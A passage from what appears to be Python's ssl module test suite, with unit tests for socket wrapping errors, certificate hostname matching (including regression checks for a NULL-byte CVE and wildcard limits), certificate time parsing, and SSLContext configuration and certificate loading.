self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
